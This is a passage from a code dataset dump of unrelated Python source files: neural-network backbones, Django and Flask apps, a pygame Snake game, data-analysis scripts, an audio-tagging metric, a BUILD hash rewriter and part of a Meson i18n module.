dataset e.g. 20\n num_classes = 26\n\n x = Flatten()(base_model.output)\n predictions = Dense(num_classes, activation='softmax')(x)\n\n # create graph of your new model\n head_model = Model(input=base_model.input, output=predictions)\n\n model = head_model\n\n return model\n\n\nif __name__ == '__main__':\n MobileNetv2((224, 224, 3), 100)\n","sub_path":"mobilenet_v2.py","file_name":"mobilenet_v2.py","file_ext":"py","file_size_in_byte":6210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"197675130","text":"import sys\nimport os\nimport csv\n\nsys.path.append(r\"C:\\Users\\estasney\\PycharmProjects\\FlaskAPIWeb\\mysite\")\n# sys.path.append(\"/home/estasney1/mysite\")\n\nfrom app_folder import create_app\nfrom app_folder.models import LinkedInRecord\n\nprint(\"Fetching Records\")\n\nsave_path = 'corpus.csv'\n\napp = create_app()\napp.app_context().push()\n\n\nprofiles = LinkedInRecord.query.all()\n\nwith open(save_path, 'w+', newline='', encoding='utf-8') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(['member_id', 'title', 'company', 'summary', 'skills'])\n\n for profile in profiles:\n member_id = profile.member_id\n profile_text = []\n profile_text.append(profile.summary)\n title = \"\"\n company = \"\"\n for job in profile.jobs:\n if job.index == 0:\n title = job.title\n company = job.companyName\n profile_text.append(job.summary)\n\n profile_text = list(filter(lambda x: x is not None and len(x) > 5, profile_text))\n if not profile_text:\n profile_text = \"\"\n else:\n profile_text = [x.replace(\"\\n\", \" \").replace(\"\\t\", \" \") for x in profile_text]\n profile_text = \"\\n\".join(profile_text)\n\n skills = profile.skills if profile.skills else \"\"\n\n writer.writerow([member_id, title, company, profile_text, skills])\n","sub_path":"scripts2/make_corpus.py","file_name":"make_corpus.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"37729672","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('products/', views.products, name='products'),\n path('create_product/', views.createProduct, name='create_product'),\n path('update_product/', views.updateProduct, name='update_product'),\n path('delete_product/', views.deleteProduct, name='delete_product'),\n path('custumer/', views.custumer, name='custumer'),\n path('create_order/', views.createOrder, name='create_order'),\n path('update_order/', views.updateOrder, name='update_order'),\n path('delete_order/', views.deleteOrder, name='delete_order'),\n path('login/', views.loginPage, name='login'),\n path('register/', views.registerPage, name='register'),\n path('logout/', views.logoutPage, name='logout'),\n path('user/', views.userPage, name='user-page'),\n path('account/', views.accountSetting, name='account-page'),\n]\n\n","sub_path":"Asyari/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"394597812","text":"import torch.nn as nn\r\nimport torch\r\nfrom torchsummary import summary\r\n\r\ndef _make_divisible(v, divisor, min_value=None):\r\n \"\"\"\r\n This function is taken from the original tf repo. It ensures that all layers have a channel number that is divisible by 8\r\n It can be seen here: https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py\r\n :param v:\r\n :param divisor:\r\n :param min_value:\r\n :return:\r\n \"\"\"\r\n if min_value is None:\r\n min_value = divisor\r\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\r\n # Make sure that round down does not go down by more than 10%.\r\n if new_v < 0.9 * v:\r\n new_v += divisor\r\n return new_v\r\n\r\nclass DoubleConv(nn.Sequential):\r\n def __init__(self, in_ch, out_ch, norm_layer=None, activation_layer=None):\r\n super(DoubleConv, self).__init__(\r\n nn.Conv2d(in_ch , out_ch, kernel_size=1),\r\n norm_layer(out_ch),\r\n activation_layer(out_ch),\r\n nn.Conv2d(out_ch, out_ch, kernel_size=3, padding=1),\r\n norm_layer(out_ch),\r\n activation_layer(out_ch),\r\n nn.UpsamplingBilinear2d(scale_factor=2)\r\n )\r\n\r\nclass ConvBNReLU(nn.Sequential):\r\n def __init__(self, in_planes, out_planes, kernel_size=3, stride=1, groups=1, norm_layer=None, activation_layer=None):\r\n padding = (kernel_size - 1) // 2\r\n super(ConvBNReLU, self).__init__(\r\n nn.Conv2d(in_planes, out_planes, kernel_size, stride, padding, groups=groups, bias=False),\r\n norm_layer(out_planes),\r\n activation_layer(out_planes)\r\n )\r\n\r\nclass InvertedResidual(nn.Module):\r\n def __init__(self, inp, oup, stride, expand_ratio, norm_layer=None, activation_layer=None):\r\n super(InvertedResidual, self).__init__()\r\n self.stride = stride\r\n assert stride in [1, 2]\r\n\r\n hidden_dim = int(round(inp * expand_ratio))\r\n self.use_res_connect = self.stride == 1 and inp == oup\r\n\r\n layers = []\r\n if expand_ratio != 1:\r\n # pw\r\n layers.append(ConvBNReLU(inp, hidden_dim, kernel_size=1, norm_layer=norm_layer, activation_layer=activation_layer))\r\n layers.extend([\r\n # dw\r\n ConvBNReLU(hidden_dim, hidden_dim, stride=stride, groups=hidden_dim, norm_layer=norm_layer, activation_layer=activation_layer),\r\n # pw-linear\r\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\r\n norm_layer(oup),\r\n ])\r\n self.conv = nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n if self.use_res_connect:\r\n return x + self.conv(x)\r\n else:\r\n return self.conv(x)\r\n\r\nclass LpNetResConcat(nn.Module):\r\n def __init__(self,\r\n input_size,\r\n joint_num,\r\n input_channel = 48,\r\n embedding_size = 2048,\r\n width_mult=1.0,\r\n round_nearest=8,\r\n block=None,\r\n norm_layer=None,\r\n activation_layer=None,\r\n inverted_residual_setting=None):\r\n\r\n super(LpNetResConcat, self).__init__()\r\n\r\n assert input_size[1] in [256]\r\n\r\n if block is None:\r\n block = InvertedResidual\r\n if norm_layer is None:\r\n norm_layer = nn.BatchNorm2d\r\n if activation_layer is None:\r\n activation_layer = nn.PReLU # PReLU does not have inplace True\r\n if inverted_residual_setting is None:\r\n inverted_residual_setting = [\r\n # t, c, n, s\r\n [1, 64, 1, 1], #[-1, 48, 256, 256]\r\n [6, 48, 2, 2], #[-1, 48, 128, 128]\r\n [6, 48, 3, 2], #[-1, 48, 64, 64]\r\n [6, 64, 4, 2], #[-1, 64, 32, 32]\r\n [6, 96, 3, 2], #[-1, 96, 16, 16]\r\n [6, 160, 3, 2], #[-1, 160, 8, 8]\r\n [6, 320, 1, 1], #[-1, 320, 8, 8]\r\n ]\r\n\r\n # building first layer\r\n inp_channel = [_make_divisible(input_channel * width_mult, round_nearest),\r\n _make_divisible(input_channel * width_mult, round_nearest) + inverted_residual_setting[0][1],\r\n inverted_residual_setting[0][1] + inverted_residual_setting[1][1],\r\n inverted_residual_setting[1][1] + inverted_residual_setting[2][1],\r\n inverted_residual_setting[2][1] + inverted_residual_setting[3][1],\r\n inverted_residual_setting[3][1] + inverted_residual_setting[4][1],\r\n inverted_residual_setting[4][1] + inverted_residual_setting[5][1],\r\n inverted_residual_setting[5][1] + inverted_residual_setting[6][1],\r\n inverted_residual_setting[6][1] + embedding_size,\r\n 256 + embedding_size,\r\n ]\r\n self.first_conv = ConvBNReLU(3, inp_channel[0], stride=1, norm_layer=norm_layer, activation_layer=activation_layer)\r\n\r\n inv_residual = []\r\n # building inverted residual blocks\r\n j = 0\r\n for t, c, n, s in inverted_residual_setting:\r\n output_channel = _make_divisible(c * width_mult, round_nearest)\r\n for i in range(n):\r\n stride = s if i == 0 else 1\r\n input_channel = inp_channel[j] if i == 0 else output_channel\r\n inv_residual.append(block(input_channel, output_channel, stride, expand_ratio=t, norm_layer=norm_layer, activation_layer=activation_layer))\r\n j += 1\r\n # make it nn.Sequential\r\n self.inv_residual = nn.Sequential(*inv_residual)\r\n\r\n self.last_conv = ConvBNReLU(inp_channel[j], embedding_size, kernel_size=1, norm_layer=norm_layer, activation_layer=activation_layer)\r\n\r\n self.deonv0 = DoubleConv(inp_channel[j+1], 256, norm_layer=norm_layer, activation_layer=activation_layer)\r\n self.deonv1 = DoubleConv(2304, 256, norm_layer=norm_layer, activation_layer=activation_layer)\r\n self.deonv2 = DoubleConv(512, 256, norm_layer=norm_layer, activation_layer=activation_layer)\r\n\r\n self.final_layer = nn.Conv2d(\r\n in_channels=256,\r\n out_channels= joint_num * 64,\r\n kernel_size=1,\r\n stride=1,\r\n padding=0\r\n )\r\n\r\n self.avgpool = nn.AvgPool2d(3, stride=2, padding=1, count_include_pad=False)\r\n self.upsample = nn.UpsamplingBilinear2d(scale_factor=2)\r\n\r\n def forward(self, x):\r\n x0 = self.first_conv(x)\r\n x1 = self.inv_residual[0:1](x0)\r\n x2 = self.inv_residual[1:3](torch.cat([x0, x1], dim=1))\r\n x0 = self.inv_residual[3:6](torch.cat([self.avgpool(x1), x2], dim=1))\r\n x1 = self.inv_residual[6:10](torch.cat([self.avgpool(x2), x0], dim=1))\r\n x2 = self.inv_residual[10:13](torch.cat([self.avgpool(x0), x1], dim=1))\r\n x0 = self.inv_residual[13:16](torch.cat([self.avgpool(x1), x2], dim=1))\r\n x1 = self.inv_residual[16:17](torch.cat([self.avgpool(x2), x0], dim=1))\r\n x2 = self.last_conv(torch.cat([x0, x1], dim=1))\r\n x0 = self.deonv0(torch.cat([x1, x2], dim=1))\r\n x1 = self.deonv1(torch.cat([self.upsample(x2), x0], dim=1))\r\n x2 = self.deonv2(torch.cat([self.upsample(x0), x1], dim=1))\r\n x0 = self.final_layer(x2)\r\n return x0\r\n\r\n def init_weights(self):\r\n for i in [self.deconv0, self.deconv1, self.deconv2]:\r\n for name, m in i.named_modules():\r\n if isinstance(m, nn.ConvTranspose2d):\r\n nn.init.normal_(m.weight, std=0.001)\r\n elif isinstance(m, nn.BatchNorm2d):\r\n nn.init.constant_(m.weight, 1)\r\n nn.init.constant_(m.bias, 0)\r\n for j in [self.first_conv, self.inv_residual, self.last_conv, self.final_layer]:\r\n for m in j.modules():\r\n if isinstance(m, nn.Conv2d):\r\n nn.init.normal_(m.weight, std=0.001)\r\n if hasattr(m, 'bias'):\r\n if m.bias is not None:\r\n nn.init.constant_(m.bias, 0)\r\n\r\nif __name__ == \"__main__\":\r\n model = LpNetResConcat((256, 256), 18)\r\n test_data = torch.rand(1, 3, 256, 256)\r\n test_outputs = model(test_data)\r\n # print(test_outputs.size())\r\n summary(model, (3, 256, 256))","sub_path":"common/backbone/lpnet_res_concat.py","file_name":"lpnet_res_concat.py","file_ext":"py","file_size_in_byte":8398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"466211351","text":"from flask import Flask, request, render_template_string\nfrom OCR import run_image\nimport json\n\napp = Flask(__name__)\n\n\ndef get_webpage():\n res = ''\n for line in open('html/index.html'):\n res += line\n return res\n\n\n@app.route('/languages')\ndef languages():\n config = json.load(open('config.json'))\n return ','.join(config.keys())\n\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef index():\n config = json.load(open('config.json'))\n if request.method == 'GET':\n return render_template_string(get_webpage(), langs=config.keys())\n else:\n return run_image(request.files['img'], request.form['lang'])\n","sub_path":"Webserver.py","file_name":"Webserver.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"613754790","text":"from SnakeGameColors import *\nimport random\nimport pygame\nimport os\npygame.init()\npygame.mixer.init()\n\nclock = pygame.time.Clock()\nfont = pygame.font.SysFont(None, 30)\n\nscreen_width = 650\nscreen_height = 450\n\ngameWindow = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"Snake Game\")\n\nstart_bg = pygame.image.load(\"start.jpg\")\nstart_bg = pygame.transform.scale(start_bg, (screen_width, screen_height)).convert_alpha()\n\ngame_bg = pygame.image.load(\"grass.png\")\ngame_bg = pygame.transform.scale(game_bg, (screen_width, screen_width)).convert_alpha()\n\nover_bg = pygame.image.load(\"over.jpg\")\nover_bg = pygame.transform.scale(over_bg, (screen_width, screen_height)).convert_alpha()\n\n\ndef start():\n exit_game = False\n pygame.mixer.music.load(\"intro.mp3\")\n pygame.mixer.music.play(-1)\n while not exit_game:\n gameWindow.fill(yellow)\n gameWindow.blit(start_bg, (0, 0))\n show_on_screen(\"Press Any Key to Start the Game......\", black, 160, 57)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit_game = True\n if event.type == pygame.KEYDOWN:\n game_loop()\n pygame.display.update()\n clock.tick(60)\n\n\ndef show_on_screen(text, color, x, y):\n screen_text = font.render(text, True, color)\n gameWindow.blit(screen_text, [x, y])\n\n\ndef grow_snake(base, color, ordinates, size):\n for x, y in ordinates:\n pygame.draw.rect(base, color, [x, y, size, size])\n\n\ndef game_loop():\n if not os.path.exists(\"high_score.txt\"):\n with open(\"high_score.txt\", \"w\") as hs:\n hs.write(\"0\")\n with open(\"high_score.txt\", \"r\") as hs:\n high_score = hs.read()\n\n pygame.mixer.music.load(\"bg.mp3\")\n pygame.mixer.music.play(-1)\n\n food_x = random.randint(20, screen_width - 20)\n food_y = random.randint(75, screen_height - 20)\n food_radius = 5\n velocity_x = 0\n velocity_y = 0\n snake_size = 10\n snake_y = 220\n snake_x = 320\n score = 0\n fps = 50\n\n snake_length = 1\n snake_list = []\n\n exit_game = False\n game_over = False\n\n while not exit_game:\n if game_over:\n gameWindow.fill(white)\n gameWindow.blit(game_bg, (0, 0))\n show_on_screen(\"Game Over!!! Press Return to Continue\", red, 130, 160)\n show_on_screen(\"Your Score : \" + str(score), red, 230, 180)\n show_on_screen(\"High Score : \" + str(high_score), red, 230, 200)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit_game = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n game_over = False\n game_loop()\n\n else:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit_game = True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n velocity_y = -5\n velocity_x = 0\n if event.key == pygame.K_DOWN:\n velocity_x = 0\n velocity_y = 5\n if event.key == pygame.K_RIGHT:\n velocity_y = 0\n velocity_x = 5\n if event.key == pygame.K_LEFT:\n velocity_y = 0\n velocity_x = -5\n\n snake_x = snake_x + velocity_x\n snake_y = snake_y + velocity_y\n\n if abs(snake_x - food_x) < 5 and abs(snake_y - food_y) < 5:\n # pygame.mixer.music.load(\"food.mp3\")\n # pygame.mixer.music.play()\n score = score + 10\n snake_length = snake_length + 3\n food_x = random.randint(20, screen_width - 20)\n food_y = random.randint(50, screen_height - 20)\n # pygame.mixer.music.load(\"bg.mp3\")\n # pygame.mixer.music.play(-1)\n elif abs(food_x - snake_x) < 5 and abs(food_y - snake_y) < 5:\n # pygame.mixer.music.load(\"food.mp3\")\n # pygame.mixer.music.play()\n score = score + 10\n snake_length = snake_length + 3\n food_x = random.randint(20, screen_width - 20)\n food_y = random.randint(50, screen_height - 20)\n # pygame.mixer.music.load(\"bg.mp3\")\n # pygame.mixer.music.play(-1)\n\n gameWindow.fill(white)\n gameWindow.blit(game_bg, (0, 0))\n show_on_screen(\"Score : \" + str(score) + \" High Score : \" + str(high_score), purple, 10, 10)\n pygame.draw.line(gameWindow, brown, (0, 40), (screen_width, 40), 3)\n pygame.draw.circle(gameWindow, red, [food_x, food_y], food_radius)\n\n snake_head = list()\n snake_head.append(snake_x)\n snake_head.append(snake_y)\n snake_list.append(snake_head)\n\n if len(snake_list) > snake_length:\n del snake_list[0]\n\n if snake_head in snake_list[:-1]:\n pygame.mixer.music.load(\"over.mp3\")\n pygame.mixer.music.play()\n if int(high_score) <= score:\n with open(\"high_score.txt\", \"w\") as hs:\n hs.write(str(score))\n game_over = True\n\n if snake_x < 0 or snake_x > screen_width or snake_y < 40 or snake_y > screen_height:\n pygame.mixer.music.load(\"over.mp3\")\n pygame.mixer.music.play()\n if int(high_score) <= score:\n with open(\"high_score.txt\", \"w\") as hs:\n hs.write(str(score))\n game_over = True\n\n if int(high_score) < score:\n high_score = score\n\n grow_snake(gameWindow, black, snake_list, snake_size)\n pygame.display.update()\n clock.tick(fps)\n\n pygame.quit()\n quit()\n\n\nstart()\n","sub_path":"SnakeGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"220114523","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 16 13:31:41 2017\n\n@author: mmic\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Reading the excel file into python with necessary rows and columns\n\nr=pd.read_excel('C:\\\\Users\\\\mmic\\\\Documents\\\\Python Tutorial\\\\Python\\\\'+\n 'Bangladesh_Remittance_HIES2010.xlsx',sheetname=\"Sheet1\",\n index_col=None,na_values=['NA'],skiprows=7,\n parse_cols=\"A,F:G,J:M,P,U\")\n\n## Data cleaning\n\nr['Total_Remittance']=r['Total_money_sent']+r['Value of product sent']\n# Converting total remittance in USD\n# US-BDT exchange rate in 2010\nE=71.17\nr['Total_Remittance']=r['Total_Remittance']/E\n# Converting total stay in abroad in months\nr['Total_Stay']=r['Months spent in abroad']+12*r['Years Spent in abroad']\nr=r[r.Total_Remittance !=0]\n# Deleting the expatriates' information reported as living in Bangladesh \n#(0 is the coutry code for Banglades)\nr=r[r.Country_Code !=0]\n\n# Recoding the country code into country name\nr['Country'] = (r['Country_Code'].map({1:'Saudi Arabia',2:'Qatar',3:'Kuwait',\n 4:'Oman',5:'Malaysia',6:'Singapore',7:'Iraq',8:'Iran',9:'Libya',10:'UAE',\n 11:'Canada',12:'Australia',13:'UK',14:'USA',15:'South Korea',16:'Japan',\n 17:'Turkey',18:'Germany',19:'Sweden',20:'Russia',21:'Other European Countries',\n 23:'Brunei',24:'Mauritius',25:'South Africa',26:'Others'}))\n\n## Graph 1\nplt.style.use('ggplot')\nfig1, ax = plt.subplots()\ngroup_names = ['0 year', '1-5 years','6-10 years','11-12 years','13-16 years',\n '>16 years']\nr['categories'] = pd.cut(r['Level of Education'], bins=[-1,0,5,10,12,16,18], \n labels=['0 year', '1-5 years','6-10 years',\n '11-12 years','13-16 years', '>16 years'])\ncounts = r['categories'].value_counts(sort=False)\nplt.axis('equal')\nexplode = (0.2, 0.1,0.1,0.2,0.1,0.1)\ncolors = ['#c0d6e4','#6a6aa7','#40e0d0','#ee6363','#0071C6','#008DB8',]\ncounts.plot(kind='pie', fontsize=12,colors=colors,explode=explode,autopct='%.2f')\nplt.legend(labels=group_names,loc=2,bbox_to_anchor=(0.8,0.4))\nplt.ylabel('')\nplt.title('Graph-1: Level of Education of the expatriates (In Percentage)')\n# save graph 1\nfig1.savefig('Graph-1.png', transparent=False, dpi=90, bbox_inches=\"tight\")\n\n# Graph 2\nfig2, ax = plt.subplots()\nr.groupby('Country')['Total_Remittance'].sum().plot(kind='bar')\nplt.ylabel('Remittance Amount (USD)')\nplt.title('Graph-2: Remittance Inflow by the Location of Expatriates')\n# save graph 2\nfig2.savefig('Graph-2.png', transparent=False, dpi=90, bbox_inches=\"tight\")\n\n# Graph 3\nfig3, ax = plt.subplots()\nplt.scatter(r['Level of Education'], np.log(r['Total_Remittance']), alpha=0.15,\n marker='o')\nplt.plot(np.unique(r['Level of Education']),\n np.poly1d(np.polyfit(r['Level of Education'],\n np.log(r['Total_Remittance']), 1))\n (np.unique(r['Level of Education'])),color='Black', \n linestyle=\"--\", linewidth=2)\nplt.scatter(r['Level of Education'], np.log(r['Total_Remittance']), \n alpha=0.15, marker='o')\nplt.ylabel('Remittance (Log)')\nplt.xlabel('Level of Education (Years)')\nplt.title('Graph-3: Remittance and Level of Education')\n# save graph 3\nfig3.savefig('Graph-3.png', transparent=False, dpi=90, bbox_inches=\"tight\")","sub_path":"ProblemSets/ProblemSet5/PS5_Chowdhury.py","file_name":"PS5_Chowdhury.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"169670158","text":"import torch\nimport numpy as np\nfrom sklearn import metrics\nfrom sklearn.metrics import log_loss\n\n# https://www.kaggle.com/c/rfcx-species-audio-detection/discussion/198418#1086063\ndef _one_sample_positive_class_precisions(scores, truth):\n num_classes = scores.shape[0]\n pos_class_indices = np.flatnonzero(truth > 0)\n\n if not len(pos_class_indices):\n return pos_class_indices, np.zeros(0)\n\n retrieved_classes = np.argsort(scores)[::-1]\n\n class_rankings = np.zeros(num_classes, dtype=np.int)\n class_rankings[retrieved_classes] = range(num_classes)\n\n retrieved_class_true = np.zeros(num_classes, dtype=np.bool)\n retrieved_class_true[class_rankings[pos_class_indices]] = True\n\n retrieved_cumulative_hits = np.cumsum(retrieved_class_true)\n\n precision_at_hits = (\n retrieved_cumulative_hits[class_rankings[pos_class_indices]] /\n (1 + class_rankings[pos_class_indices].astype(np.float)))\n return pos_class_indices, precision_at_hits\n\ndef lwlrap(truth, scores):\n assert truth.shape == scores.shape\n num_samples, num_classes = scores.shape\n precisions_for_samples_by_classes = np.zeros((num_samples, num_classes))\n for sample_num in range(num_samples):\n pos_class_indices, precision_at_hits = _one_sample_positive_class_precisions(scores[sample_num, :], truth[sample_num, :])\n precisions_for_samples_by_classes[sample_num, pos_class_indices] = precision_at_hits\n\n labels_per_class = np.sum(truth > 0, axis=0)\n weight_per_class = labels_per_class / float(np.sum(labels_per_class))\n\n per_class_lwlrap = (np.sum(precisions_for_samples_by_classes, axis=0) /\n np.maximum(1, labels_per_class))\n return per_class_lwlrap, weight_per_class\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\nclass MetricMeter(object):\n def __init__(self):\n self.reset()\n \n def reset(self):\n self.y_true = []\n self.y_pred = []\n \n def update(self, y_true, y_pred):\n self.y_true.extend(y_true.cpu().detach().numpy().tolist())\n self.y_pred.extend(torch.sigmoid(y_pred).cpu().detach().numpy().tolist())\n\n @property\n def avg(self):\n \n score_class, weight = lwlrap(np.array(self.y_true), np.array(self.y_pred))\n self.score = (score_class * weight).sum()\n\n return {\n \"lwlrap\" : self.score\n }\n","sub_path":"BASELINE/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"204760029","text":"\"\"\"A Python script to rewrite hashes in BUILD files.\"\"\"\n\nimport ast\n\n\n# These are templated in by Go. It's a bit hacky but is a way of avoiding\n# passing arbitrary arguments through Go / C calls.\nFILENAME = '__FILENAME__'\nTARGETS = {__TARGETS__}\nPLATFORM = '__PLATFORM__'\n\n\ndef is_a_target(node):\n \"\"\"Returns the name of a node if it's a target that we're interested in.\"\"\"\n if isinstance(node, ast.Expr) and isinstance(node.value, ast.Call):\n for keyword in node.value.keywords:\n if keyword.arg == 'name':\n if isinstance(keyword.value, ast.Str) and keyword.value.s in TARGETS:\n return keyword.value.s\n\n\ndef replace_hash(line, before, after):\n \"\"\"Rewrites a hash within one particular line. Returns updated line.\"\"\"\n quote = lambda s, q: q + s + q\n return line.replace(quote(before, '\"'), quote(after, '\"')).replace(quote(before, \"'\"), quote(after, \"'\"))\n\n\nwith _open(FILENAME) as f:\n lines = f.readlines()\n tree = ast.parse(''.join(lines), filename=FILENAME)\n\nfor node in ast.iter_child_nodes(tree):\n name = is_a_target(node)\n if name:\n for keyword in node.value.keywords:\n if keyword.arg == 'hashes' and isinstance(keyword.value, ast.List):\n # lineno - 1 because lines in the ast are 1-indexed\n candidates = {dep.s: dep.lineno - 1 for dep in keyword.value.elts\n if isinstance(dep, ast.Str)}\n # Filter by any leading platform (i.e. linux_amd64: abcdef12345).\n platform_candidates = {k: v for k, v in candidates.items() if PLATFORM in k}\n prefix = ''\n if len(platform_candidates) == 1:\n candidates = platform_candidates\n prefix = PLATFORM + ': '\n # Should really do something here about multiple hashes and working out which\n # is which...\n current, lineno = candidates.popitem()\n prefix, colon, _ = current.rpartition(':')\n if colon:\n colon += ' '\n lines[lineno] = replace_hash(lines[lineno], current, prefix + colon + TARGETS[name])\n elif keyword.arg == 'hash' and isinstance(keyword.value, ast.Str):\n lineno = keyword.value.lineno - 1\n current = keyword.value.s\n prefix = current[:current.find(':') + 2] if ': ' in current else ''\n lines[lineno] = replace_hash(lines[lineno], current, prefix + TARGETS[name])\n\n\nwith _open(FILENAME, 'w') as f:\n for line in lines:\n f.write(line)\n","sub_path":"src/hashes/hash_rewriter.py","file_name":"hash_rewriter.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"351405357","text":"from django.conf.urls import url\n\nfrom . import views\n\n\napp_name = 'projects'\nurlpatterns = [\n url(r'^(?P\\w+)/(?P\\w+)-(?P\\d+)$', views.worklogs, name='worklogs'),\n url(r'^(?P\\w+)/(?P\\w+)-(?P\\d+)/(?P\\d+)$', views.detail, name='detail'),\n # url(r'^(?P\\w+)/(?P\\w+)-(?P\\d+)/(?P\\d+)/edit$', views.edit_worklog, name='edit_worklog'),\n # url(r'^save$', views.save_worklog, name='save_worklog'),\n]\n","sub_path":"soloist/apps/projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"408573099","text":"# from .models import Question\n# from django.http import HttpResponse\n\nfrom django.shortcuts import render, get_object_or_404\nfrom .forms import PostForm\nfrom django.template import loader\nfrom django.utils import timezone\nfrom .models import Post\nfrom django.shortcuts import redirect\n\n# def index(request):\n\n # return HttpResponse(\"Hello, world. You're at the polls index.\")\n# def detail(request, question_id):\n # return HttpResponse(\"You're looking at question %s.\" % question_id)\n# def results(request, question_id):\n\n # response = \"You're looking at the results of question %s.\"\n # return HttpResponse(response % question_id)\n# def vote(request, question_id):\n # return HttpResponse(\"You're voting on question %s.\" % question_id)\n# def index(request):\n # latest_question_list = Question.objects.order_by('-pub_date')[:5]\n # template = loader.get_template('polls/index.html')\n # context = { 'latest_question_list': latest_question_list, }\n\n # return HttpResponse(template.render(context, request))\n\n#Post.objects.get(pk=pk)\n# ----------------------------------------//-------------------------------------------------------\n\n\ndef post_list(request):\n\n post = Post.objects.filter( published_date__lte=timezone.now()).order_by('published_date')\n return render(request, 'polls/postlist.html', {'post': post})\n\n# ----------------------------------------//-------------------------------------------------------\n\n\ndef post_detail(request, pk):\n \n post = get_object_or_404(Post, pk=pk)\n return render(request, 'polls/post_detail.html', {'post': post})\n\n# ----------------------------------------//-------------------------------------------------------\n\n\ndef post_new(request):\n\n\n if request.method == \"POST\":\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('post_detail', pk=post.pk)\n else:\n form = PostForm()\n return render(request, 'polls/post_edit.html', {'form': form})\n\n \n \n# ----------------------------------------//-------------------------------------------------------\n\ndef post_edit(request, pk):\n post = get_object_or_404(Post, pk=pk)\n if request.method == \"POST\":\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('post_detail', pk=post.pk)\n else:\n form = PostForm(instance=post)\n return render(request, 'polls/post_edit.html', {'form': form})\n","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"334188934","text":"# Copyright 2016 The Meson development team\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom .. import coredata, mesonlib, build\nimport sys\n\nclass I18nModule:\n\n def gettext(self, state, args, kwargs):\n if len(args) != 1:\n raise coredata.MesonException('Gettext requires one positional argument (package name).')\n packagename = args[0]\n languages = mesonlib.stringlistify(kwargs.get('languages', []))\n if len(languages) == 0:\n raise coredata.MesonException('List of languages empty.')\n datadirs = mesonlib.stringlistify(kwargs.get('data_dirs', []))\n extra_args = mesonlib.stringlistify(kwargs.get('args', []))\n\n pkg_arg = '--pkgname=' + packagename\n lang_arg = '--langs=' + '@@'.join(languages)\n datadirs = '--datadirs=' + ':'.join(datadirs) if datadirs else None\n extra_args = '--extra-args=' + '@@'.join(extra_args) if extra_args else None\n\n potargs = [state.environment.get_build_command(), '--internal', 'gettext', 'pot', pkg_arg]\n if datadirs:\n potargs.append(datadirs)\n if extra_args:\n potargs.append(extra_args)\n pottarget = build.RunTarget(packagename + '-pot', sys.executable, potargs, [], state.subdir)\n\n gmoargs = [state.environment.get_build_command(), '--internal', 'gettext', 'gen_gmo', lang_arg]\n gmotarget = build.RunTarget(packagename + '-gmo', sys.executable, gmoargs, [], state.subdir)\n\n updatepoargs = [state.environment.get_build_command(), '--internal', 'gettext', 'update_po', pkg_arg, lang_arg]\n if datadirs:\n updatepoargs.append(datadirs)\n if extra_args:\n updatepoargs.append(extra_args)\n updatepotarget = build.RunTarget(packagename + '-update-po', sys.executable, updatepoargs, [], state.subdir)\n\n installcmd = [sys.executable, state.environment.get_build_command(),\n '--internal', 'gettext', 'install',\n '--subdir=' + state.subdir,\n '--localedir=' + 